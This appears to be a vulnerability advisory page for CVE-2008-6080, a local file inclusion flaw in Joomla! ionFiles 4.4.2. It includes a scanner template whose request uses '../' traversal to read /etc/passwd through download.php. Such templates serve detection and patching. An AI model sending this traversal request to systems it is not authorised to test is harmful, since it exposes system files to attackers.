CVE-2008-6080: Joomla! ionFiles 4.4.2 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! ionFiles | POC: 已公开

漏洞描述

Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.

PoC代码[已公开]

id: CVE-2008-6080

info:
  name: Joomla! ionFiles 4.4.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: |
    Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/6809
    - https://nvd.nist.gov/vuln/detail/CVE-2008-6080
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/46039
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2008-6080
    cwe-id: CWE-22
    epss-score: 0.063
    epss-percentile: 0.90588
    cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: codecall
    product: com_ionfiles
  tags: cve,cve2008,edb,joomla,lfi,codecall

http:
  - method: GET
    path:
      - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100931461e5d0f5db6e9a44023e63e8cc78bf7e8b06508d0bd1d92dc0318e5d3a8a022100a0d64fc4499731352e1badc77cd4ffc5d74ee50ce993559761c148702f7fa571:922c64590222798bb761d5b6d8e72950

相关漏洞推荐